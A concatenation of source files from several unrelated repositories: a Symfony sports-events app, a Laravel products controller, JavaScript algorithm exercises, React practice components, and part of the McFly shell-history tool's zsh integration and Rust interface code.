$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Saint Exupéry');
$evenement->setDescription('Championnat d\'Europe de BaseBall');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$date3 = '2018-06-10';
$time = '13:00';
$evenement = new Evenements();
$evenement->setName('Coupe UEFA des régions');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Saint-Lô');
$evenement->setDescription('Football - Coupe UEFA des régions');
$evenement->setVille('Saint-Lô');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$manager->flush();
}
}<file_sep>/mrsport/src/MrsportBundle/Form/EvenementsType.php
<?php
namespace MrsportBundle\Form;
use Symfony\Component\Form\AbstractType;
use Symfony\Component\Form\FormBuilderInterface;
use Symfony\Component\OptionsResolver\OptionsResolver;
use Symfony\Bridge\Doctrine\Form\Type\EntityType;
use Symfony\Component\Form\Extension\Core\Type\DateType;
use Symfony\Component\Form\Extension\Core\Type\TextType;
use Symfony\Component\Form\Extension\Core\Type\TextareaType;
use MrsportBundle\Entity\Sports;
class EvenementsType extends AbstractType
{
/**
* {@inheritdoc}
*/
public function buildForm(FormBuilderInterface $builder, array $options)
{
$builder
->add('name',TextType::class, [
"required" => true
])
->add('date')
->add('time')
->add('adresse',TextType::class, [
"required" => true
])
->add('ville',TextType::class, [
"required" => true
])
->add('description',TextareaType::class, [
"required" => true
])
->add('telephone', TextType::class, [
"required" => true
])
->add('email', TextType::class, [
"required" => true
])
->add('sports',EntityType::class, array(
'class' => Sports::class,
// 'choice_label' => 'name',
'multiple' => false,
'expanded' => true,
));
}/**
* {@inheritdoc}
*/
public function configureOptions(OptionsResolver $resolver)
{
$resolver->setDefaults(array(
'data_class' => 'MrsportBundle\Entity\Evenements'
));
}
/**
* {@inheritdoc}
*/
public function getBlockPrefix()
{
return 'mrsportbundle_evenements';
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/clubRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* clubRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class clubRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('c')
->orderBy('c.id', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
public function getClubWithStatus($status = 'valide')
{
$qb = $this->createQueryBuilder('c')
->where("c.status = :identifier")
->orderBy('c.id', 'ASC')
->setParameter(':identifier', $status)
->getQuery();
return $qb->execute();
}
}
<file_sep>/mrsport/src/MrsportBundle/Controller/EvenementsController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Evenements;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
/**
* Evenement controller.
*
*/
class EvenementsController extends Controller
{
/**
* Lists all evenement entities.
*
*/
public function indexAction()
{
$em = $this->getDoctrine()->getManager();
$evenements = $em->getRepository(Evenements::class)->getEventWithStatus('valide');
return $this->render('evenements/index.html.twig', array(
'evenements' => $evenements,
));
}
public function adminEvenementsAction()
{
$em = $this->getDoctrine()->getManager();
$evenements = $em->getRepository('MrsportBundle:Evenements')->findAll();
return $this->render('@Mrsport/admin/validation_evenement.html.twig', array(
'evenements' => $evenements,
));
}
/**
* @Security("has_role('ROLE_USER')")
*
*/
public function newAction(Request $request)
{
$evenement = new Evenements();
$form = $this->createForm('MrsportBundle\Form\EvenementsType', $evenement);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$evenement->setStatus('new');
$em->persist($evenement);
$em->flush();
return $this->redirectToRoute('evenements_show', array('id' => $evenement->getId()));
}
return $this->render('evenements/new.html.twig', array(
'evenement' => $evenement,
'form' => $form->createView(),
));
}
/**
* Finds and displays a evenement entity.
*
*/
public function showAction(Evenements $evenement)
{
$deleteForm = $this->createDeleteForm($evenement);
return $this->render('evenements/show.html.twig', array(
'evenement' => $evenement,
'delete_form' => $deleteForm->createView(),
));
}
/**
* @Security("has_role('ROLE_ADMIN')")
*
*/
public function editAction(Request $request, Evenements $evenement)
{
//die('jkhjk');
$deleteForm = $this->createDeleteForm($evenement);
$editForm = $this->createForm('MrsportBundle\Form\EvenementsType', $evenement);
$editForm->handleRequest($request);
if ($editForm->isSubmitted() && $editForm->isValid()) {
$this->getDoctrine()->getManager()->flush();
return $this->redirectToRoute('evenements_index', array('id' => $evenement->getId()));
}
return $this->render('evenements/edit.html.twig', array(
'evenement' => $evenement,
'edit_form' => $editForm->createView(),
'delete_form' => $deleteForm->createView(),
));
}
/**
* Deletes a evenement entity.
*
*/
public function deleteAction(Request $request, Evenements $evenement)
{
$form = $this->createDeleteForm($evenement);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->remove($evenement);
$em->flush();
}
return $this->redirectToRoute('evenements_index');
}
/**
* Creates a form to delete a evenement entity.
*
* @param Evenements $evenement The evenement entity
*
* @return \Symfony\Component\Form\Form The form
*/
private function createDeleteForm(Evenements $evenement)
{
return $this->createFormBuilder()
->setAction($this->generateUrl('evenements_delete', array('id' => $evenement->getId())))
->setMethod('DELETE')
->getForm()
;
}
public function show($id)
{
$evenements = $this->getDoctrine()
->getRepository(Evenements::class)
->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$evenements->setStatus('valide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('dashboard');
}
public function valideAction($id)
{
$em = $this->getDoctrine()->getManager();
$evenements = $this->getDoctrine()->getRepository(Evenements::class)->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$em = $this->getDoctrine()->getManager();
$evenements->setStatus('valide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('mrsport_validation_evenement');
}
public function invalideAction($id)
{
$em = $this->getDoctrine()->getManager();
$evenements = $this->getDoctrine()->getRepository(Evenements::class)->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$evenements->setStatus('invalide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('mrsport_validation_evenement');
}
}
| f13357e79f37ee6a99047036b03cc4e140b525e9 | [
"Markdown",
"PHP"
] | 13 | PHP | AnaisVandenDriessche/MRSPORT | d586108e311efe062dc9db22c43f91729a375661 | 88ca6fe975d16e08ec6c4460bfa8a774ad16455e |
refs/heads/main | <repo_name>youk0160/MERN<file_sep>/React/Functional Components/to-do-list/src/components/Item.jsx
import React from 'react';
const Item = (props)=>{
let itemClass="";
if (props.item.complete) itemClass="text-decoration-line-through";
return(
<>
<li className="list-group-item">
<input type="checkbox" onChange={(event)=>{props.toggleComplete(props.i)}}/>
<span className={itemClass}>{props.item.name}</span>
<button type="submit" onClick={(event)=>{props.deleteItem(props.i)}}>Delete</button>
</li>
</>
)
}
export default Item;<file_sep>/React/Class Components/putting_together/src/App.js
import logo from './logo.svg';
import './App.css';
import Person from './components/Person'
function App() {
return (
<div className="App">
<Person name={"<NAME>"} age={45} hairColor={"Black"}></Person>
<Person name={"<NAME>"} age={88} hairColor={"Brown"}></Person>
</div>
);
}
export default App;
<file_sep>/React/Functional Components/more_forms/src/App.js
import logo from './logo.svg';
import './App.css';
import MoreForm from './components/MoreForm'
function App() {
return (
<div className="App container">
<MoreForm></MoreForm>
</div>
);
}
export default App;
<file_sep>/Fundamentals/algo.js
// // // // arr = [3,1,2,3,7,34,1];
// // // // const sortedArr = arr => {
// // // // for(var x=1; x<arr.length ;x++) {
// // // // while(arr[x-1]>arr[x]) {
// // // // var temp = arr[x-1];
// // // // arr[x-1] = arr[x];
// // // // arr[x] = temp;
// // // // }
// // // // }
// // // // return arr;
// // // // }
// // // // console.log(sortedArr);
// const { resourceLimits } = require("worker_threads");
// // // // function insertionsort(arr){
// // // // for(var i=1; i<arr.length ;i++) {
// // // // var x=i;
// // // // while(arr[x-1]>arr[x]) {
// // // // var temp = arr[x-1];
// // // // arr[x-1] = arr[x];
// // // // arr[x] = temp;
// // // // x -= 1;
// // // // }
// // // // }
// // // // return arr;
// // // // }
// // // // console.log(insertionsort([345,122,423,53,237,134,143]));
// // // // //one function to combine two already sorted array (helper function)
// // // // const combine = (arr1, arr2)=>{
// // // // result = []
// // // // //no nested loops!
// // // // while(arr1.length!=0 && arr2.length!=0) {
// // // // if(arr1[0]<arr2[0]) {
// // // // result.push(arr1.pop());
// // // // }
// // // // else {
// // // // result.push(arr2.pop());
// // // // }
// // // // }
// // // // result=result+arr1+arr2;
// // // // return result;
// // // // }
// // // // //https://www.hackerearth.com/practice/algorithms/sorting/merge-sort/visualize/ with this array [2,4,6,3,5,1,9,0] start at step 74 for the logic if you need a hint
// // // // console.log(combine([2,3,4,6],[0,1,5,9]));
// // // // const merge = (arr)=>{
// // // // //this function will break down one unsorted array into single element arrays and recursively call the combine function to combine the already sorted arrays- hint--> you can use .slice()
// // // // if(arr.length==1) return arr;
// // // // var midpt = Math.floor(arr.length/2);
// // // // var leftArr=merge(arr.slice(0,midpt))
// // // // var rightArr=merge(arr.slice(-midpt))
// // // // return combine(leftArr,rightArr);
// // // // }
// // // // console.log(merge([2,3,4,0,1,5,9]));
// // // //helper function Partition--> goal is to pick a number at the end of the array, and arrange the array so that there is this element has everything that is less than it to the left (doesn't have to be ordered) and everything greater than it to the right (doesnt have to be ordered)
// // // const partition = (arr, start=0, end = arr.length-1)=>{ //when integrating this with quicksort, you'll need to give default parameters
// // // var numless=start;
// // // for(var i=start; i<=end;i++) {
// // // if((arr[i] < arr[end]) || (i == end)) {
// // // var temp = arr[numless];
// // // arr[numless] = arr[i];
// // // arr[i] = temp;
// // // numless++;
// // // }
// // // }
// // // numless--;
// // // return numless;
// // // }
// // // //[7,3,4,9,0,2,5]
// // // //select a element at the end (this element is called out pivot number) --(5)
// // // //go from left to right and count how many elements are less than the pivot, and whenever an element that is less than the pivot is found, swap the current value with the index of numless
// // // //[3,7,4,9,0,2,5]
// // // //[3,4,7,9,0,2,5]
// // // //[3,4,0,9,7,2,5]
// // // //[3,4,0,2,7,9,5]
// // // //[3,4,0,2,5,9,7]
// // // //return back the index number that the pivot number ended up in->4
// // // // partition([7,3,4,9,0,2,5])
// // // //numless = 0->1->2->3->4
// // // const quicksort = (arr, start=0, end = arr.length-1)=>{
// // // if(end > start) {
// // // var pivotInd = partition(arr, start, end);
// // // quicksort(arr, start, pivotInd-1);
// // // quicksort(arr, pivotInd+1,end);
// // // }
// // // }
// // // var arr = [3,7,4,9,0,2,5];
// // // quicksort(arr);
// // // console.log(arr);
// // ////given a string that can be a sentence, put each word into an array
// // // let sentence = "Hi everybody, welcome to week two"
// // // const stringToWordArr = (input)=>{
// // // var arr=[];
// // // var word = "";
// // // for(var i=0; i<input.length; i++) {
// // // if(input[i] == " ") {
// // // arr.push(word.replace(/[,]+/, "").trim());
// // // word="";
// // // }
// // // else if(input[i] == [a-zA-Z]) word +=input[i];
// // // }
// // // if(word!="") arr.push(word);
// // // console.log(arr);
// // // }
// // // stringToWordArr(sentence) //["Hi", "everybody," , "welcome", "to", "week", "two"]
// // //rotate string--> given a string and a number, return a string that is the rotated version of the original by x number of characters
// // // function rotateString(str,num){
// // // // let result=str.substr(str.length-num)+str.substr(0,str.length-num);
// // // let result="";
// // // for(var i=str.length-num; i<=str.length-1; i++) {
// // // result += str[i];
// // // }
// // // for(var i=0; i<str.length-num; i++) {
// // // result += str[i];
// // // }
// // // return result;
// // // }
// // // rotateString("hello", 2) //"olhel"
// // // rotateString("steph curry is best shooter of all time", 4) //"time steph curry is best shooter of all"
// // // rotateString("them roots tho", 6) //"ts thothem roo"
// // // //bonus- isRotation-->given two strings, return a boolean on if they are rotations of one another
// // // function isRotation(str1, str2){
// // // for(var i=1; i<str1.length; i++) {
// // // if(rotateString(str1,i) == str2) return true;
// // // }
// // // return false;
// // // }
// // // console.log(isRotation("hello", "lohel")) //true
// // // console.log(isRotation("abcd", "dacc")) //false
// // // //instructions: Given a string, create a function that returns to you a new string containing only the latest instance of each letter from the sentence, without any duplicates. Make it case sensitive first so 'S' and 's' are not considered duplicates
// // // function dedupeStr(str){
// // // var arr=[];
// // // for(var i=0;i<str.length-1;i++) {
// // // for(var j=i+1; j<str.length; j++) {
// // // if(str[i] == str[j]) break;
// // // else {
// // // if(j==str.length-1) arr.push(str[i]);
// // // }
// // // }
// // // if(i==str.length-2) arr.push(str[i+1]);
// // // }
// // // return arr;
// // // }
// // // console.log(dedupeStr("Snaps! crackles! pops!"))// ['S', 'n', 'r', 'a', 'c', 'k', 'l', 'e', ' ', 'o', 'p', 's', '!' ]
// // //encode--> given a string with repeating consecuctive characters, give a number for each number of repeats next to the letter
// // //example ---> aaabccccdd -> a3b1c3d2
// // const encode = (str)=>{
// // let output = ""
// // let count = 0;
// // for(var i=0;i<str.length;i++) {
// // if (i==0 || str[i]==str[i-1]) count++
// // else {
// // output += str[i-1]+count;
// // count=1;
// // }
// // }
// // return output
// // }
// // console.log(encode("aaabbbsddsssddcccaaabc")) //a3b1c3d2
// // //decode--> given an encoded string, decode it
// // //example ---> a2b3c1---> aabbbc
// // const decode = (str)=>{
// // let output = ""
// // for(var i=0;i<str.length-1;i++) {
// // if(/[a-z]/.test(str[i])){
// // var stopInd = str.substring(i+1).search(/[a-zA-Z]/)+1
// // if (!stopInd) stopInd=(str.length-1)-i;
// // output += (str[i]).repeat(parseInt(str.substring(i+1,stopInd+i+1)));
// // }
// // }
// // return output;
// // }
// // console.log(decode("a10b10c1")) //aabbbc
// //Intersect Sorted Arrays
// //Given two sorted arrays, return a new array containing all the numbers they have in common
// //Ex: given [2,4,7,9,10] and [2,3,5,7,9,10], return [2,7,9,10]
// //Ex: given [1,1,4,5,8] and [1,1,1,5,6,8] return [1,1,5,8]
// //Ex: given [1,3,5,7,9] and [2,4,6,8,10] return []
// const intersect = (arrLeft, arrRight) => {
// const result = arrLeft.filter(val => {
// const ind = arrRight.indexOf(val);
// if(ind!=-1) arrRight.splice(ind,1);
// return ind > -1
// })
// return result;
// }
// console.log(intersect([2,3,5,7,9,10],[2,4,7,9,10]));
// console.log(intersect([1,1,1,5,6,8],[1,1,4,5,8]));
// console.log(intersect([2,4,6,8,10],[1,3,5,7,9]));
// console.log(intersect([-5, 0, 1, 1, 1, 1, 1, 2, 4, 4, 6, 7],[-9, 1, 3, 4, 4, 4, 4, 4, 4, 5, 7]));
// //Union Sorted Arrays
// //Efficiently combine two pre-sorted arrays into a new sorted array
// //Ex: given [2,4,7,9,10] and [2,3,5,7,9,10], return [2,3,4,5,7,9,10]
// //Ex: given [1,2,2,2,7] and [2,2,6,6,7] return [1,2,2,2,6,6,7]
// //Ex: given [1,5,9] and [2,6,10] return [1,2,5,6,9,10]
// const union = (arrLeft, arrRight) => {
// arrLeft.forEach(val => {
// const ind = arrRight.indexOf(val);
// if(ind!=-1) arrRight.splice(ind,1);
// })
// result=arrLeft.concat(arrRight)
// return result.sort((a,b)=>a-b);
// }
// console.log(union([2,4,7,9,10],[2,3,5,7,9,10]));
// console.log(union([2,2,6,6,7],[1,2,2,2,7]));
// console.log(union([1,5,9],[2,6,10]));
// console.log(union([2,6,10],[1,5,9]));
function fiveHeads() {
return new Promise( (resolve, reject) => {
if(Math.floor(Math.random()*2)==0) resolve("head");
else reject("tail")
});
}
fiveHeads()
.then( res => console.log(res) )
.catch( err => console.log(err) );
console.log( "When does this run now?" );
<file_sep>/React/Class Components/putting_together/src/components/Person.jsx
import React, { Component } from 'react';
class Person extends Component {
constructor(props) {
super(props);
this.state = {
age: this.props.age
};
}
render() {
let addAge = ()=>{
this.setState({age:this.state.age+1})
}
return (
<div>
<h2>{this.props.name}</h2>
<h4>Age: {this.state.age}</h4>
<h4>hair Color: {this.props.hairColor}</h4>
<button onClick={addAge}>Birthday Button for {this.props.name}</button>
</div>
)
}
}
export default Person;<file_sep>/React/Functional Components/to-do-list/src/components/Form.jsx
import React,{useState} from 'react';
const Form = (props)=>{
const [itemVal, setItemVal] = useState("");
const handleSubmit = (e) =>{
e.preventDefault();
const item = {
name: itemVal,
complete:false,
};
props.onNewSubmit(item);
}
return(
<>
<form onSubmit={handleSubmit}>
<input type="text" name="" id="" onChange={(e)=> setItemVal(e.target.value)} />
<button type="submit">Add</button>
</form>
</>
)
}
export default Form; | ccd8275813a430ac63ae1ca743a5871b8c124954 | [
"JavaScript"
] | 6 | JavaScript | youk0160/MERN | a5807bbffff276d6b42380fb443675a8c5e33334 | 42eb75b81b306d60e54e9580d5f217c3a2e88255 |
refs/heads/master | <repo_name>Merlot1818/ArraryBuffer<file_sep>/TypedArray.js
// create a TypedArray with a size in bytes
const typedArray1 = new Int8Array(8);
typedArray1[0] = 32;
const typedArray2 = new Int8Array(typedArray1);
typedArray2[1] = 42;
console.log(typedArray1);
// expected output: Int8Array [32, 0, 0, 0, 0, 0, 0, 0]
console.log(typedArray2);
// expected output: Int8Array [32, 42, 0, 0, 0, 0, 0, 0]
var buffer = new ArrayBuffer(16);
var int32View = new Int32Array(buffer);
console.log(int32View.length);
for (var i = 0; i < int32View.length; i++) {
int32View[i] = i * 2;
}
var int16View = new Int16Array(buffer);
for (var i = 0; i < int16View.length; i++) {
console.log("Entry " + i + ": " + int16View[i]);
}
// 假定某段buffer包含如下字节 [0x02, 0x01, 0x03, 0x07]
var buffer = new ArrayBuffer(4);
var v1 = new Uint8Array(buffer);
v1[0] = 2;
v1[1] = 1;
v1[2] = 3;
v1[3] = 7;
var uInt16View = new Uint16Array(buffer);
// 计算机采用小端字节序
// 所以头两个字节等于258
console.log(uInt16View);
if (uInt16View[0] === 258) {
console.log('OK'); // "OK"
}
// 赋值运算
uInt16View[0] = 255; // 字节变为[0xFF, 0x00, 0x03, 0x07]
uInt16View[0] = 0xff05; // 字节变为[0x05, 0xFF, 0x03, 0x07]
uInt16View[1] = 0x0210; // 字节变为[0x05, 0xFF, 0x10, 0x02]
console.log(uInt16View);<file_sep>/README.md
# ArraryBuffer
# 参考链接
1. https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer#%E4%BB%A5%E7%8E%B0%E6%9C%89%E6%95%B0%E6%8D%AE%E8%8E%B7%E5%8F%96_ArrayBuffer
2. https://developer.mozilla.org/zh-CN/docs/Web/API/WindowBase64/Base64_encoding_and_decoding#Appendix.3A_Decode_a_Base64_string_to_Uint8Array_or_ArrayBuffer
3. https://developer.mozilla.org/zh-CN/docs/Web/API/FileReader#readAsArrayBuffer()
4. | 6421a922f4b281895b3ad97da2800a16d994f8d6 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | Merlot1818/ArraryBuffer | 57729a61f666245b1bbca138b92fbac0c4edc0a2 | ccbd0a0e777603c38e2f4a51ceea7e588fcbf150 |
refs/heads/master | <repo_name>abdulkareem-mnv-dev/coalition<file_sep>/database/factories/ProductsFactory.php
<?php
/** @var \Illuminate\Database\Eloquent\Factory $factory */
use App\Products;
use Faker\Generator as Faker;
$factory->define(Products::class, function (Faker $faker) {
return [
'name' => $faker->unique()->words(1,true),
'quantity' => rand(1,30),
'price' => rand(50,1000)
];
});
<file_sep>/app/Http/Controllers/indexController.php
<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Products;
class indexController extends Controller
{
public function index(){
$products = Products::orderBy('created_at', 'DESC')->get();
return view('product_page')->with([
'products' => $products
]);
}
public function addProduct(Request $request){
$data = $request->all();
$product = new Products();
$product->name = $data['name'];
$product->quantity = $data['quantity'];
$product->price = $data['price'];
$product->save();
return response()->json(['product' => $product]);
}
}
| 0b6670bfa725978a9611ec7d7e5c911e7378127d | [
"PHP"
] | 2 | PHP | abdulkareem-mnv-dev/coalition | b690c376d9e6fc5921dbed96c1c5bd81b968cf1b | 2a95e0fb0b194b15ee8fa944317248a8128071f9 |
refs/heads/master | <repo_name>rcereceda/prueba_js<file_sep>/p3/main.js
function Alumno(nombre, notas) {
this.nombre = typeof(nombre) == "string" ? nombre : "Juan";
this.notas = Array.isArray(notas) ? notas : [0, 0, 0];
this.promedio = function() {
var suma = 0;
var n = 0;
for (var i = 0; i < this.notas.length; i++) {
if (!(isNaN(this.notas[i]))) {
suma += parseInt(this.notas[i]);
n++;
}
}
return n > 0 ? (suma/n) : 0;
}
}
var alumno1 = new Alumno("Rodrigo", [10, 9, 10]);
var promedio1 = alumno1.promedio();
console.log(promedio1);<file_sep>/p5/main.js
var x = 0;
$("[name=left]").on('click', function() {
$("[name=box]").css({left: x - 50, position:'absolute'});
x = $("[name=box]").position().left;
})
$("[name=right]").on('click', function() {
$("[name=box]").css({left: x + 50, position:'absolute'});
x = $("[name=box]").position().left;
})<file_sep>/p1/main.js
var alumno1 = {nombre:"Matías", edad:5}
var alumno2 = alumno1
alumno2.nombre = "Sebastián"
console.log("Alumno 1: " + alumno1.nombre);
console.log("Alumno 2: " + alumno2.nombre);<file_sep>/p2/main.js
var user1 = {
nombre: "Rodrigo",
edad: 33,
arr: [1,2,3]
};
function copiarObjeto(obj) {
return (JSON.parse(JSON.stringify(obj)));
}
var user2 = copiarObjeto(user1);
user2.nombre = "Jorge";
console.log("Rodrigo: " + user1.arr[0]);
console.log("Jorge: " + user2.arr[0]);<file_sep>/p6/main.js
var count = 3;
$("div").on('click', function() {
count++;
$("ol").append("<li>Elemento " + count + "</li>");
})
$("div").on('click', 'li' , function (e) {
e.stopPropagation();
}) | ed6884bafa47d59b5d6565c437f0f3787d68898b | [
"JavaScript"
] | 5 | JavaScript | rcereceda/prueba_js | be008e8efb3b292f7313f6fe5318c1f417d432f1 | a6f2d70d2cca14637de33694e63e268613ea798c |
refs/heads/master | <repo_name>nfultz/mcfly<file_sep>/Cargo.toml
[package]
name = "mcfly"
version = "0.5.13"
authors = ["<NAME> <<EMAIL>>"]
edition = "2018"
description = "McFly replaces your default ctrl-r shell history search with an intelligent search engine that takes into account your working directory and the context of recently executed commands. McFly's suggestions are prioritized in real time with a small neural network."
license = "MIT"
repository = "https://github.com/cantino/mcfly"
exclude = [
"HomebrewFormula",
"HomebrewFormula/*",
"pkg/*",
"docs/*",
]
[profile.release]
lto = true
[profile.dev]
debug = true
[dependencies]
chrono = "0.4.19"
clap = "2.33"
csv = "1"
dirs = "2.0"
humantime = "2.1.0"
itertools = "0.9.0"
libc = "0.2"
rand = "0.7"
regex = "1"
relative-path = "1.0"
shellexpand = "2.0"
termion = "1.5.5"
unicode-segmentation = "1.6"
[dependencies.rusqlite]
version = "0.15.0"
features = ["bundled", "functions", "unlock_notify"]
<file_sep>/mcfly.zsh
#!/bin/zsh
# Ensure stdin is a tty
[[ ! -o interactive ]] && return 0
# Avoid loading this file more than once
if [[ "$__MCFLY_LOADED" == "loaded" ]]; then
return 0
fi
__MCFLY_LOADED="loaded"
# Ensure HISTFILE exists.
export HISTFILE="${HISTFILE:-$HOME/.zsh_history}"
if [[ ! -r "${HISTFILE}" ]]; then
echo "McFly: ${HISTFILE} does not exist or is not readable. Please fix this or set HISTFILE to something else before using McFly."
return 1
fi
# MCFLY_SESSION_ID is used by McFly internally to keep track of the commands from a particular terminal session.
export MCFLY_SESSION_ID=$(command dd if=/dev/urandom bs=256 count=1 2> /dev/null | LC_ALL=C command tr -dc 'a-zA-Z0-9' | command head -c 24)
# Find the binary
MCFLY_PATH=${MCFLY_PATH:-$(command -v mcfly)}
if [[ -z "$MCFLY_PATH" || "$MCFLY_PATH" == "mcfly not found" ]]; then
echo "Cannot find the mcfly binary, please make sure that mcfly is in your path before sourcing mcfly.zsh."
return 1
fi
# Required for commented out mcfly search commands to work.
setopt interactive_comments # allow comments in interactive shells (like Bash does)
# McFly's temporary, per-session history file.
if [[ ! -f "${MCFLY_HISTORY}" ]]; then
export MCFLY_HISTORY=$(command mktemp -t mcfly.XXXXXXXX)
fi
# Check if we need to use extended history
if [[ -o extendedhistory ]]; then
export MCFLY_HISTORY_FORMAT="zsh-extended"
else
export MCFLY_HISTORY_FORMAT="zsh"
fi
# Setup a function to be used by $PROMPT_COMMAND.
function mcfly_prompt_command {
local exit_code=$? # Record exit status of previous command.
# Populate McFly's temporary, per-session history file from recent commands in the shell's primary HISTFILE.
if [[ ! -f "${MCFLY_HISTORY}" ]]; then
export MCFLY_HISTORY=$(command mktemp -t mcfly.XXXXXXXX)
command tail -n100 "${HISTFILE}" >| ${MCFLY_HISTORY}
fi
# Write history to $MCFLY_HISTORY.
fc -W "${MCFLY_HISTORY}"
# Run mcfly with the saved code. It fill find the text of the last command in $MCFLY_HISTORY and save it to the database.
[ -n "$MCFLY_DEBUG" ] && echo "mcfly.zsh: Run mcfly add --exit ${exit_code}"
$MCFLY_PATH --history_format $MCFLY_HISTORY_FORMAT add --exit ${exit_code}
return ${exit_code} # Restore the original exit code by returning it.
}
precmd_functions+=(mcfly_prompt_command)
# Cleanup $MCFLY_HISTORY tmp files on exit.
exit_logger() {
[ -n "$MCFLY_DEBUG" ] && echo "mcfly.zsh: Exiting and removing $MCFLY_HISTORY"
command rm -f $MCFLY_HISTORY
}
zshexit_functions+=(exit_logger)
# If this is an interactive shell, take ownership of ctrl-r.
if [[ $- =~ .*i.* ]]; then
mcfly-history-widget() {
() {
echoti rmkx
exec </dev/tty
local mcfly_output=$(mktemp -t mcfly.output.XXXXXXXX)
$MCFLY_PATH --history_format $MCFLY_HISTORY_FORMAT search -o "${mcfly_output}" "${LBUFFER}"
echoti smkx
# Interpret commandline/run requests from McFly
while read -r key val; do
if [[ "$key" = "mode" ]]; then local mode="$val"; fi
if [[ "$key" = "commandline" ]]; then local commandline="$val"; fi
done < "${mcfly_output}"
command rm -f $mcfly_output
if [[ -n $commandline ]]; then
RBUFFER=""
LBUFFER="${commandline}"
fi
if [[ "${mode}" == "run" ]]; then
zle accept-line
fi
zle redisplay
}
}
zle -N mcfly-history-widget
bindkey '^R' mcfly-history-widget
fi
<file_sep>/src/interface.rs
use crate::command_input::{CommandInput, Move};
use crate::history::History;
use crate::fixed_length_grapheme_string::FixedLengthGraphemeString;
use crate::history::Command;
use crate::history_cleaner;
use crate::settings::Settings;
use crate::settings::{InterfaceView, KeyScheme};
use chrono::{Duration, TimeZone, Utc};
use humantime::format_duration;
use std::io::{stdin, stdout, Write};
use termion::color;
use termion::event::Key;
use termion::input::TermRead;
use termion::raw::IntoRawMode;
use termion::screen::AlternateScreen;
use termion::{clear, cursor, terminal_size};
/// State for McFly's interactive history-search TUI: the typed query, the
/// current matches, the cursor/selection, and the UI mode flags.
pub struct Interface<'a> {
    // History store queried for matches and updated with selections.
    history: &'a History,
    // User/CLI settings controlling key scheme, colors, limits, etc.
    settings: &'a Settings,
    // The editable query line shown at the prompt.
    input: CommandInput,
    // Index of the highlighted row within `matches`.
    selection: usize,
    // Commands currently matching `input`, in display order.
    matches: Vec<Command>,
    // When true, per-match ranking features are rendered next to each result.
    debug: bool,
    // Set when the user asked to run the selection immediately (Enter vs TAB).
    run: bool,
    // Commands the user deleted during this session, to be scrubbed by the caller.
    delete_requests: Vec<String>,
    // Which menu bar / confirmation state the UI is in.
    menu_mode: MenuMode,
    // Vim key scheme only: whether we are in insert (vs command) mode.
    in_vim_insert_mode: bool,
}
/// Outcome of one interactive session, returned from [`Interface::display`].
pub struct SelectionResult {
    /// Whether the user requested to run the resulting command immediately.
    pub run: bool,
    /// The command string the user selected, if any.
    pub selection: Option<String>,
    /// Commands the user has requested be deleted from shell history.
    pub delete_requests: Vec<String>,
}
/// Direction the user asked to move the highlighted result.
pub enum MoveSelection {
    Up,
    Down,
}
/// UI mode: normal browsing, or awaiting Y/N confirmation of a delete.
#[derive(PartialEq)]
pub enum MenuMode {
    Normal,
    ConfirmDelete,
}
impl MenuMode {
    /// Menu-bar text for the current mode, taking the active key scheme
    /// (and, for Vim, insert vs command mode) into account.
    fn text(&self, interface: &Interface) -> &str {
        if *self == MenuMode::ConfirmDelete {
            return "Delete selected command from the history? (Y/N)";
        }
        match interface.settings.key_scheme {
            KeyScheme::Emacs => "McFly | ESC - Exit | ⏎ - Run | TAB - Edit | F2 - Delete",
            KeyScheme::Vim if interface.in_vim_insert_mode => {
                "McFly (Ins) | ESC - Cmd | ⏎ - Run | TAB - Edit | F2 - Delete"
            }
            KeyScheme::Vim => "McFly (Cmd) | ESC - Exit | ⏎ - Run | TAB - Edit | F2 - Delete",
        }
    }

    /// Menu-bar background color escape sequence for the current mode.
    fn bg(&self) -> String {
        if let MenuMode::ConfirmDelete = *self {
            color::Bg(color::Red).to_string()
        } else {
            color::Bg(color::LightBlue).to_string()
        }
    }
}
// Terminal row offsets used by the *_index helper methods below to position
// the prompt, the menu/info bar, and the first result row.
const PROMPT_LINE_INDEX: u16 = 3;
const INFO_LINE_INDEX: u16 = 1;
const RESULTS_TOP_INDEX: u16 = 5;
impl<'a> Interface<'a> {
pub fn new(settings: &'a Settings, history: &'a History) -> Interface<'a> {
Interface {
history,
settings,
input: CommandInput::from(settings.command.to_owned()),
selection: 0,
matches: Vec::new(),
debug: settings.debug,
run: false,
delete_requests: Vec::new(),
menu_mode: MenuMode::Normal,
in_vim_insert_mode: true,
}
}
    /// Run the interactive selection loop and return what the user chose.
    ///
    /// Rebuilds the history cache for the current dir/session, runs the
    /// blocking key loop (`select`), then — if the final input is non-blank —
    /// records the selection in history before returning it.
    pub fn display(&mut self) -> SelectionResult {
